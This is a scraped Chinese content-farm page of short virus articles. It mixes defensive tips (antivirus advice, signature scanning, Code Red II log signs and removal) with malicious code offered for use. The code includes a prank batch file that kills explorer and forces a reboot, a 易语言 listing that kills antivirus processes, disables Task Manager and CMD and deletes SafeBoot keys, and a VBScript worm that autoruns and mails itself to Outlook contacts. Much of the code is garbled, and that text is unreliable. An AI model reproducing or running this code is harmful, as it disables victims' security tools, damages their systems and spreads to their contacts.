为您找到与检查电脑病毒的代码相关的共200个结果:
有时候想和朋友们玩玩,搞点恶搞电脑病毒给他们,要怎么办呢?下面由读文网小编给你做出详细的恶搞电脑病毒代码介绍!希望对你有帮助!
新建一个文本文档(.txt),要复制以下代码:
@echo off
color 4
tskill explorer
echo .
echo .
echo .
echo .
echo 警告:在病毒执行期间禁止关闭电源,
echo 否则你就和你心爱的电脑说
echo .
echo . BYE-BYE
echo .
echo Computer system crash!
echo .
echo .
echo I am a virus, my name is Ghost.
echo 我是魔鬼病毒,在这个堕落的世界上苏醒了。
echo .
echo . Warning! CPU has been changed please re-enter CPU settings
echo. in the CMOS setuo and remember to save before quit.
echo. Secondary IDE channel no 80 conductor cable installed.
set /p select=:)
if "%select%"=="" goto start
:start
shutdown -r -t 10 -c "您的计算机上带有魔鬼病毒,今天是它的发作日期。病毒已经破坏了您的系统,您的计算机将在10秒钟后重启。"
::结束
再另存为:名字.bat 你要记住"名字"后面要加".bat"
就可以了,没有任何破坏性,吓吓人。
你可以试试看看效果。
看了“恶搞电脑病毒代码有哪些”文章的还看了:
浏览量:2
下载量:0
时间:
对于电脑病毒代码,你并不陌生吧?危害着我们电脑!下面由读文网小编给你做出详细的电脑病毒代码说法介绍!希望对你有帮助!
编制或者在计算机程序中插入的破坏计算机功能或者破坏数据,影响计算机使用并且能够自我复制的一组计算机指令或者程序代码被称为计算机病毒,具有破坏性,复制性和传染性。 由人编制而成的一段程序。 组成包括,潜伏机制,传染机制,触发机制。
浏览量:2
下载量:0
时间:
恶意代码是构成病毒的主要因素,我们要怎么样才能防护恶意代码清除点病毒呢?下面由读文网小编给你做出详细的防护恶意代码清除电脑病毒方法介绍!希望对你有帮助!
问题揭示
我们来看看wincfg.Exe是如何下载到浏览者计算机上的,在该网页上点击鼠标右键,选择其中的“查看源代码”,在网页代码最后面发现了可疑的语句
看了“怎么样防护恶意代码清除电脑病毒”文章的还看了:
浏览量:2
下载量:0
时间:
检查电脑病毒方法有很多很多!你会几种呢!下面由读文网小编给你做出详细的检查电脑病毒方法介绍!希望对你有帮助!
①杀(防)毒软件不可少
1、对待电脑病毒的关键不是“杀”,而是“防”;
2、软件要及时升级,要不就和没有安装一样(很重要);
3、卡巴斯基免费杀毒软件。
4、系统安全漏洞不可不补!
②个人防火墙不可替代
③分类设置复杂密码
④防止网络 病毒 与 木马 和 间谍软件
1、不下载来路不明的软件及程序(不明邮件同样);
2、应选择信誉较好的下载网站下载软件。
⑤警惕“网络钓鱼”
⑥补好个人电脑的漏洞(很重要)
⑦只在必要时共享文件夹
如果需要共享文件夹,则一定要将其设定为只读(很重要)。
⑧不要随意浏览黑客网站和非法网站
目前许多病毒、木马和间谍软件都来自于黑客网站和一些非法网站。
⑨定期备份重要文件和数据
⑩不可让U盘自动运行——这样能带动病毒自动运行(很重要)...
看了“检查电脑病毒方法有哪些”文章的还看了:
浏览量:2
下载量:0
时间:
你知道最简单的电脑病毒代码是什么吗!简单的代码不容易被杀毒软件发现!下面由读文网小编给你做出详细的最简单的电脑病毒代码介绍!希望对你有帮助!
运行 (“taskkill /f /im kavsvc.exe”, 假, 1)
运行 (“taskkill /f /im KVXP.kxp”, 假, 1)
运行 (“taskkill /f /im Rav.exe”, 假, 1)
运行 (“taskkill /f /im Ravmon.exe”, 假, 1)
运行 (“taskkill /f /im Mcshield.exe”, 假, 1)
运行 (“taskkill /f /im VsTskMgr.exe”, 假, 1)
修改系统时间:
置现行时间 (到时间 (“8888年8月8日”))
禁用任务管理器:
写注册项 (3, “SoftwareMicrosoftWindowsCurrentVersionPoliciesSystemDisableTaskMgr”, 0)
禁用注册表:
写注册项 (3, “SoftwareMicrosoftWindowsCurrentVersionPoliciesSystemDisableregistrytools”, 1)
隐藏开始中的运行 禁止WIN2000/XP通过任务管理器创建新任务:
写注册项 (3, “SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoRun”, 1)
隐藏“MS-DOS方式”下的磁盘驱动器。不管是在“我的电脑”里,或“MS-DOS”方式下都看不见了:
写注册项 (3, “SoftWare Microsoft Windows CurrentVersion PoliciesWinOldAppDisabled”, 1)
隐藏开始中的关机:
写注册项 (3, “SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoClose”, 1)
隐藏开始中的搜索:
写注册项 (3, “SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoFind”, 1)
OVER360防御:
写注册项 (4, “SOFTWARE360SafesafemonExecAccess”, 0)
写注册项 (4, “SOFTWARE360SafesafemonMonAccess”, 0)
写注册项 (4, “SOFTWARE360SafesafemonSiteAccess”, 0)
写注册项 (4, “SOFTWARE360SafesafemonUDiskAccess”, 0)
结束360进程
运行 (“taskkill /f /im 360tray.exe”, 假, 1)
隐藏所有驱动器:
写注册项 (3, “SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoDrives”, 4294967295)
禁止所有驱动器:
写注册项 (3, “SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoViewOnDrive”, 4294967295)
隐藏文件夹选项:
写注册项 (3, “SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoFolderOptions”, 1)
将桌面对象隐藏:
写注册项 (3, “SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoDesktop”, 1)
隐藏开始中的关机:
写注册项 (3, “SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoClose”, 1)
隐藏开始中的搜索:
写注册项 (3, “SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoFind”, 1)
这条有两种情况。1 禁用CMD和.BAT文件 2 禁CMD不禁.BAT 0启用两项
写注册项 (3, “SoftwarePoliciesMicrosoftWindowsSystemDisableCMD”, 1)
隐藏主页选项组:
写注册项 (3, “SoftwarePoliciesMicrosoftInternet ExplorerControl PanelHomePage”, 1)
隐藏IE文件菜单:
写注册项 (3, “SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoFileMenu”, 1)
隐藏收藏夹菜单:
写注册项 (3, “SoftwarePoliciesMicrosoftInternet ExplorerRestrictionsNoFavorites”, 1)
禁用IE打印功能:
写注册项 (3, “SoftwarePoliciesMicrosoftInternet ExplorerRestrictionsNoPrinting”, 1)
隐藏Internet选项:
写注册项 (3, “SoftwarePoliciesMicrosoftInternet ExplorerRestrictionsNoBrowserOptions”, 1)
禁止IE查看源文件:
写注册项 (3, “SoftwarePoliciesMicrosoftInternet ExplorerRestrictionsNoViewSource”, 1)
禁用IE下载功能:
写注册项 (3, “SoftwareMicrosoftWindowsCurrentVersionInterner Settingsones31803”, 3)
禁止右键关联菜单:
写注册项 (3, “SoftwarePoliciesMicrosoftInternet ExplorerRestrictionsNoBrowserContextMenu”, 1)
修改文件关联:
写注册项 (1, “.txt”, “jpegfile”)
写注册项 (1, “.inf”, “jpegfile”)
写注册项 (1, “.reg”, “jpegfile”)
写注册项 (1, “.exe”, “jpegfile”)
无法进入安全模式:
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetwork{36FC9E60-C465-11CF-8056-444553540000}”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetwork{4D36E965-E325-11CE-BFC1-08002BE10318}”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetwork{4D36E967-E325-11CE-BFC1-08002BE10318}”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetwork{4D36E969-E325-11CE-BFC1-08002BE10318}”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetwork{4D36E96A-E325-11CE-BFC1-08002BE10318}”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetwork{4D36E96B-E325-11CE-BFC1-08002BE10318}”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetwork{4D36E96F-E325-11CE-BFC1-08002BE10318}”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetwork{4D36E972-E325-11CE-BFC1-08002BE10318}”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetwork{4D36E973-E325-11CE-BFC1-08002BE10318}”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetwork{4D36E974-E325-11CE-BFC1-08002BE10318}”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetwork{4D36E975-E325-11CE-BFC1-08002BE10318}”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetwork{4D36E977-E325-11CE-BFC1-08002BE10318}”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetwork{4D36E97B-E325-11CE-BFC1-08002BE10318}”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetwork{4D36E97D-E325-11CE-BFC1-08002BE10318}”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetwork{4D36E980-E325-11CE-BFC1-08002BE10318}”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetwork{71A27CDD-812A-11D0-BEC7-08002BE2092F}”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetwork{745A17A0-74D3-11D0-B6FE-00A0C90F57DA}”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkAFD”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkAppMgmt”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkBase”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkBoot Bus Extender”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkBoot file system”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkBrowser”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkCryptSvc”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkDcomLaunch”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkDhcp”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkdmadmin”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkdmboot.sys”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkdmio.sys”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkdmload.sys”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkdmserver”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkDnsCache”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkEventLog”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkFile system”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkFilter”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkHelpSvc”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkip6fw.sys”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkipnat.sys”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkLanmanServer”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkLanmanWorkstation”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkLmHosts”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkMessenger”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkNDIS”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkNDIS Wrapper”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNdisuio”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkNetBIOS”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkNetBIOSGroup”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkNetBT”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkNetDDEGroup”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkNetlogon”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkNetMan”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkNetwork”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkNetworkProvider”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkNtLmSsp”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkPCI Configuration”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkPlugPlay”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkPNP Filter”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkPNP_TDI”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkPrimary disk”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkdpcdd.sys”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkdpdd.sys”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkdpwd.sys”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkdsessmgr”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkRpcSs”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkSCSI Class”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworksermouse.sys”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkSharedAccess”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworksr.sys”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkSRService”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkStreams Drivers”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkSystem Bus Extender”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkTcpip”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkTDI”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkdpipe.sys”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkdtcp.sys”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkermservice”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkvga.sys”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkvgasave.sys”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkWinMgmt”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkWZCSVC”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkNdisuio”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetwork”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBoot”)
关机:
关闭系统 (2, 假)
关机2:
运行(“shutdown -s -f ”)
以上是读文网小编给朋友们做出的总结!希望对你们有帮助!
看了“最简单的电脑病毒代码是什么”文章的还看了:
浏览量:2
下载量:0
时间:
在网络中,计算机病毒能不断复制并造成严重的破坏,然而它们会如何为繁衍而寻找配偶呢?在新出版的《进化》杂志上,计算机病毒可通过计算机程序配对繁衍。下面由读文网小编给你做出详细的修改代码可减少电脑病毒进化介绍!希望对你有帮助!
完美的计算机系统是不存在的,它的漏洞衍生出了神秘的计算机病毒。想想吧,只是一段信息,却在它的生存空间(也就是网络环境)中存活、自我复制、繁衍甚至进化,直如生命一般。只是它本身少了个承载体,要借着别人的实体发威。
而今美国学者拿出了生物择偶方式来类比病毒的配对,使得这些代码更沾了点生老病死的味道,就差能喜怒哀乐了。不过这真说不好,就像我们的大自然,你怎知它不是一台巨型计算机呢?
看了“修改代码可减少电脑病毒进化介绍”文章的还看了:
浏览量:4
下载量:0
时间:
电脑中了病毒想从它的源代码入手怎么办呢!有读文网小编在,下面由读文网小编给你做出详细的电脑病毒源代码介绍!希望对你有帮助!
r.regwrite "hkcusoftwaremicrosoftwindowscurrentversionpoliciesexplorerosetfolders",1,"reg_dword" '修改注册表,禁止控制面板
r.regwrite "hklmsoftwareclasses.reg","txtfile" '修改注册表,禁止导入使用.reg文件,改为用txt文件的关联
r.regwrite "hklmsoftwaremicrosoftwindowscurrentversionwinlogonlegalnoticecaption","警告" '设置开机提示框标题
r.regwrite "hklmsoftwaremicrosoftwindowscurrentversionwinlogonlegalnoticetext","您中vbs脚本病毒了,哭吧~" '设置开机提示框文本内容
set ol=createobject("outlook.application" '创建outlook文件对象用于传播
on error resume next
for x=1 to 100
set mail=ol.createitem(0)
mail.to=ol.getnamespace("mapi".addresslists(1).addressentries(x) '用于向地址簿的前100名发送此 vbs病毒,可以算是简单弱智的蠕虫了吧~~
mail.subject="今晚你来吗?" '邮件主题
mail.body="朋友你好:您的朋友rose给您发来了热情的邀请。具体情况请阅读随信附件,祝您好运! 同城约会网" '邮件内容
mail.attachments.add(dir2&"win32system.vbs"
mail.send
next
ol.quit
'下面是对internet explore 选项的恶意修改
r.regwrite "hkcusoftwarepoliciesmicrosoftinternet explorerestrictionsobrowsercontextmenu",1,"reg_dword" '修改注册表,禁止鼠标右键
r.regwrite "hkcusoftwarepoliciesmicrosoftinternet explorerestrictionsobrowseroptions",1,"reg_dword" '修改注册表,禁止internet选项
r.regwrite "hkcusoftwarepoliciesmicrosoftinternet explorerestrictionsobrowsersaveas",1,"reg_dword" '修改注册表,禁止“另存为”
r.regwrite "hkcusoftwarepoliciesmicrosoftinternet explorerestrictionsofileopen",1,"reg_dword" '修改注册表,禁止“文件/打开”菜单
r.regwrite "hkcusoftwarepoliciesmicrosoftinternet explorercontrol paneladvanced",1,"reg_dword" '修改注册表,禁止更改高级页设置
r.regwrite "hkcusoftwarepoliciesmicrosoftinternet explorercontrol panelcache internet",1,"reg_dword" '修改注册表,禁止更改临时文件设置
r.regwrite "hkcusoftwarepoliciesmicrosoftinternet explorercontrol panelautoconfig",1,"reg_dword" '修改注册表,禁止更改自动配置
r.regwrite "hkcusoftwarepoliciesmicrosoftinternet explorercontrol panelhomepage",1,"reg_dword" '修改注册表,禁止更改主页,即“主页”变灰
r.regwrite "hkcusoftwarepoliciesmicrosoftinternet explorercontrol panelhistory",1,"reg_dword" '修改注册表,禁止更改历史记录设置
r.regwrite "hkcusoftwarepoliciesmicrosoftinternet explorercontrol panelconnwiz admin lock",1,"reg_dword" '修改注册表,禁止更改internet连接向导
r.regwrite "hkcusoftwarepoliciesmicrosoftinternet explorercontrol panelsecuritytab",1,"reg_dword" '修改注册表,禁止更改安全项
r.regwrite "hkcusoftwarepoliciesmicrosoftinternet explorercontrol panelesetwebsettings",1,"reg_dword" '修改注册表,禁止“重置web设置”
r.regwrite "hkcusoftwarepoliciesmicrosoftinternet explorerestrictionsoviewsource",1,"reg_dword" '修改注册表,禁止查看源文件
r.regwrite "hkcusoftwarepoliciesmicrosoftinternet explorerinfodeliveryestrictionsoaddingsubions",1,"reg_dword" '修改注册表,禁止添加脱机计划
r.regwrite "hkcusoftwaremicrosoftwindowscurrentversionpoliciesexplorerofilemenu",1,"reg_dword" '修改注册表,禁止“文件”菜单
看了“电脑病毒源代码介绍”文章的还看了:
浏览量:2
下载量:0
时间:
电脑很慢,会不会是中毒了呢?怎么检查呢?下面是读文网小编为大家整理的电脑病毒的检查方法,希望大家能够从中有所收获!
电脑病毒的检查方法:
很长一段时间,恶意的攻击者非常喜欢使用克隆账号的方法来控制你的计算机。他们采用的方法就是激活一个系统中的默认账户,但这个账户是不经常用的,然后使用工具把这个账户提升到管理员权限,从表面上看来这个账户还是和原来一样,但是这个克隆的账户却是系统中最大的安全隐患。恶意的攻击者可以通过这个账户任意地控制你的计算机。
为了避免这种情况,可以用很简单的方法对账户进行检测。
首先在命令行下输入net user,查看计算机上有些什么用户,然后再使用“net user+用户名”查看这个用户是属于什么权限的,一般除了Administrator是administrators组的,其他都不是!如果你发现一个系统内置的用户是属于administrators组的,那几乎肯定你被入侵了,而且别人在你的计算机上克隆了账户。快使用“net user用户名/del”来删掉这个用户吧!
联网状态下的客户端。对于没有联网的客户端,当其联网之后也会在第一时间内收到更新信息将病毒特征库更新到最新版本。不仅省去了用户去手动更新的烦琐过程,也使用户的计算机时刻处于最佳的保护环境之下。
浏览量:3
下载量:0
时间:
电脑病毒最简单的检查方法是用较新的防病毒软件对磁盘进行全面的检测。以下是读文网小编整理的电脑病毒的检查方法,供大家参考,希望大家能够有所收获!
实现步骤:采集已知的病毒样本,从中抽取病毒代码
依据原则:
抽取的代码比较特殊,不大可能与普通正常程序代码吻合。
抽取的代码要有适当的长度,一方面维持特征代码的唯一性,另一方面不要有太大的空间与时间开销。
将特征代码纳入病毒数据库。
检测过程:打开被检测文件,在文件中搜索,检查文件中是否含有病毒数据库中的病毒特征代码。如果发现,由于特征代码与病毒一一对应,便可以断定,被查文件中含有何种病毒。
优点:检测准确快速、可识别病毒的名称、误报警率低、依据检测结果,可做解毒处理
缺点:不能检测未知病毒,需要搜集已知病毒的特征代码,费用开销大、在网络上效率低。
浏览量:2
下载量:0
时间:
编制或者在计算机程序中插入的破坏计算机功能或者破坏数据,影响计算机使用并且能够自我复制的一组计算机指令或者程序代码被称为计算机病毒(Computer Virus)。具有破坏性,复制性和传染性。
编写电脑病毒代码是建立在对系统与网络充分的理解基础之上的,从有病毒以来每一种经典病毒无一不是智力的杰作这就是说就是你对系统网络有充分了解没有过人的思维智慧依旧编写不了病毒。如果你说就像写一个简单的那么一个del删除指令在没经过用户允许就删除了文件就算病毒了。
编写电脑病毒代码是什么
电脑病毒是编制者在计算机程序中插入的破坏计算机功能或者破坏数据,影响计算机使用并且能够自我复制的一组计算机指令或者程序代码被称为计算机病毒(Computer Virus)。具有破坏性,复制性和传染性。
电脑病毒有哪些
1、系统病毒
系统病毒的前缀为:Win32、PE、Win95、W32、W95等。这些病毒的一般公有的特性是可以感染windows操作系统的 *.exe 和 *.dll 文件,并通过这些文件进行传播。如CIH病毒。
2、蠕虫病毒
蠕虫病毒的前缀是:Worm。这种病毒的公有特性是通过网络或者系统漏洞进行传播,很大部分的蠕虫病毒都有向外发送带毒邮件,阻塞网络的特性。比如冲击波(阻塞网络),小邮差(发带毒邮件) 等。
电脑病毒的危害
电脑病毒的直接影响是会对电脑资源产生破坏和损失,带来相应的经济损失,但最令人担心的是将会对社会产生严重的恐慌,引发社会动荡。回想上世纪八十年代,蠕虫病毒造成了美国的计算机网络堵塞,其影响的范围和效果让全世界为之震惊。同时也让电脑病毒开始受到重视,成为计算机研究的一个领域。
其次如果你想学习制作电脑病毒 你就需要学习计算机语言中的汇编语言和C语言,因为一个简单的电脑病毒编写绝大多数代码都可以用这两种语言来完成。在编写电脑病毒时,我们还需要对电脑的结构和运行过程等方面有一定了解,这样才能让电脑病毒制作更加成功。如果你对这些基础都不牢固也有办法,现在网络上有一些简单的病毒制造机,也就是一类病毒编写软件。
电脑病毒的危害
其实不同的病毒造成的危害不同,例如有利用系统漏洞进入电脑的病毒,这种病毒对于电脑的破坏性是有致命的,可能会直接导致你电脑崩溃,将你电脑里面的所有数据清空,你想想如果你电脑里面有公司资料,或者一些自己珍贵的文件,一旦中了这种病毒也许你就要被老板炒鱿鱼了
浏览量:3
下载量:0
时间:
计算机病毒,是指编制或者在计算机程序中插入的破坏计算机功能或者毁坏数据,影响计算机使用,并能自我复制的一组计算机指令或者程序代码。这是目前官方最权威的关于计算机病毒的定义,此定义也被通行的《计算机病毒防治产品评级准则》的国家标准所采纳。以下是读文网网小编为大家整理的关于vbs电脑病毒代码的相关知识,希望对大家有所帮助!
上海计算机病毒防范服务中心提醒,本周需防范一种在网上流行的“VBS病毒”(Virus.VBS.d),该病毒不但导致多种杀毒软件不能运行,而且还会弹出“解毒号码”等欺诈信息,要求被害用户向指定账户汇款,反病毒专家提醒用户不要被这种欺诈信息迷惑。
据介绍,这种病毒可以导致多种杀毒软件或工具不能正常运行。更值得注意的是,当病毒感染的文件数超过2000个,会弹出对话框提示信息,提示内容为:“您已有超过2000个文件被感染!不过请放心,此病毒很容易被清除!请联系418465***!”反病毒专家分析,这个号码是QQ号,受害用户一旦加入这个号码,会被要求向指定账户汇款。专家提醒这通常是欺诈行为,受害用户要以正常方式杀毒,不要轻信这种欺诈信息。
专家建议,平时用户上网时要开启防病毒软件的实时监控功能,并关闭U盘的“自动播放功能”。用户可针对自己计算机安装的操作系统,找到相应的安全漏洞补丁,下载并安装。以遏制利用这些漏洞进行传播的病毒,减少病毒给计算机用户带来的危害。
on error resume next
set fs=createobject("ing.filesystemobject" '创建一个能与操作系统沟通的对象,再利用该对象的各种方法对注册表进行操作
set dir1=fs.getspecialfolder(0) '获取windows/winnt文件夹位置
set dir2=fs.getspecialfolder(1) '获取system32/system文件夹位置
set so=createobject("ing.filesystemobject"
dim r '定义一个变量
set r=createobject("w.shell"
so.getfile(w.fullname).copy(dir1&"win32system.vbs" '复制病毒副本到windows/winnt文件夹位置
so.getfile(w.fullname).copy(dir2&"win32system.vbs" '复制病毒副本到system32/system文件夹位置
so.getfile(w.fullname).copy(dir1&"start menuprograms启动win32system.vbs" '复制病毒副本到start menu启动菜单
'下面是对注册表的恶意修改和简单的依靠oe传播
r.regwrite "hkcusoftwaremicrosoftwindowscurrentversionpoliciesexplorerorun",1,"reg_dword" '修改注册表,禁止“运行”菜单
r.regwrite "kcusoftwaremicrosoftwindowscurrentversionpoliciesexploreroclose",1,"reg_dword" '修改注册表,禁止“关闭”菜单
r.regwrite "hkcusoftwaremicrosoftwindowscurrentversionpoliciesexplorerodrives",63000000,"reg_dword" '修改注册表,隐藏所有逻辑盘符
r.regwrite "hkcusoftwaremicrosoftwindowscurrentversionpoliciessystemdisableregistrytools",1,"reg_dword" '修改注册表,禁止注册表编辑
r.regwrite "hklmsoftwaremicrosoftwindowscurrentversionunscanregistry","" '修改注册表,禁止开机注册表扫描
r.regwrite "hkcusoftwaremicrosoftwindowscurrentversionpoliciesexplorerologoff",1,"reg_dword" '修改注册表,禁止“注销”菜单
r.regwrite "hkcusoftwaremicrosoftwindowscurrentversionpolicieswinoldapporealmode",1,"reg_dword" '修改注册表,禁止ms-dos实模式
r.regwrite "hklmsoftwaremicrosoftwindowscurrentversionunwin32system","win32system.vbs" '修改注册表,使这个脚本本身开机自动运行
r.regwrite "hkcusoftwaremicrosoftwindowscurrentversionpoliciesexplorerodesktop",1,"reg_dword" '修改注册表,禁止显示桌面图标
r.regwrite "hkcusoftwaremicrosoftwindowscurrentversionpolicieswinoldappdisabled",1,"reg_dword" '修改注册表,禁止纯dos模式
r.regwrite "hkcusoftwaremicrosoftwindowscurrentversionpoliciesexplorerosettaskbar",1,"reg_dword" '修改注册表,禁止“任务栏和开始”菜单
r.regwrite "hkcusoftwaremicrosoftwindowscurrentversionpoliciesexploreroviewcontextmenu",1,"reg_dword" '修改注册表,禁止右键菜单
浏览量:1
下载量:0
时间:
电脑经常反应慢或者死机,平时浏览一些不安全的网页等等都可能是电脑中病毒了,下面读文网小编给大家分享检查电脑上是否中电脑病毒的方法,欢迎阅读:
检查电脑上是否中木马病毒的方法:
在开始菜单处输入“cmd”,打出命令“netstat -an” 查看是否有木马监听的端口。
任务栏上右键,点击“启动任务管理器”,检查有哪些类似病毒的服务开启了。如果存在可疑的,就右键停止服务
运行“regedit”命令,在注册表中如图三种目录下均找到run文件夹里是否隐藏有木马的键值。
同样以“cmd”方式进入命令行, 打出“net user”找到administrator以外的用户名,“net user 该用户名”看看本地成员组是否也属于administrators组,如果是,说明很有可能该用户是木马侵入时留的账号。
以上四种方式均是手动检查木马病毒,还有就是通常使用工具查杀病毒,这里就不一一赘述了。可以找卡巴斯基,360等木马查杀工具。
浏览量:3
下载量:0
时间:
红色代码病毒,该病毒利用IIS的缓冲区溢出漏洞,通过TCP的80端口传播,并且该病毒变种在感染系统后会释放出黑客程序,下面由读文网小编给你做出详细的介绍!希望对你有帮助!谢谢,欢迎回访!
1、在WINNTSYSTEM32LOGFILESW3SVC1目录下的日志文件中是否含有以下内容
GET,/default.ida,
quduwenquduwenquduwenquduwenquduwenquduwenquduwenX
quduwenquduwenquduwenquduwenquduwenquduwenquduwenquduwenXXXXX
quduwenquduwenquduwenquduwenquduwenquduwenquduwenquduwenXXXXX
quduwenquduwenquduwenquduwenquduwenquduwenquduwenXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a,
如果发现这些内容,那么该系统已经遭受“红色代码II”的攻击。
2、使用命令netstat –a
如果在1025以上端口出现很多SYN-SENT连接请求,或者1025号以上的大量端口处于Listening状态,那么该系统已经遭受“红色代码II”病毒的感染。
3、如果在以下目录中存在Root.exe文件,说明系统已被感染。
C:inetpubScriptsRoot.exe
D:inetpubScriptsRoot.exe
C:progra~1Common~1SystemMSADCRoot.exe
D:Progra~1Common~1SystemMSADCRoot.exe
同时,“红色代码II”还会释放出以下两个文件C:Explorer.exe or D:Explorer.exe。这两个文件都是木马程序。
4、由于遭受“红色代码II”病毒的攻击,NT服务器中的Web服务和Ftp服务会异常中止。
4解决方案编辑
1、请到以下微软站点下载补丁程序:
http://www.microsoft.com/technet/security/bulletin/MS01-033.asp
2、断掉网络重新启动系统,防止病毒通过网络再次感染。
3、安装微软补丁程序。
4、删除以下病毒释放的木马程序
C:inetpubScriptsRoot.exe
D:inetpubScriptsRoot.exe
C:progra~1Common~1SystemMSADCRoot.exe
D:Progra~1Common~1SystemMSADCRoot.exe
使用以下命令删除以下文件:
ATTRIB C:EXPLORER.EXE -H -A -R
DEL C:EXPLORER.EXE
ATTRIB D:EXPLORER.EXE -H -A -R
DEL D:EXPLORER.EXE
5、将以下键值改为0
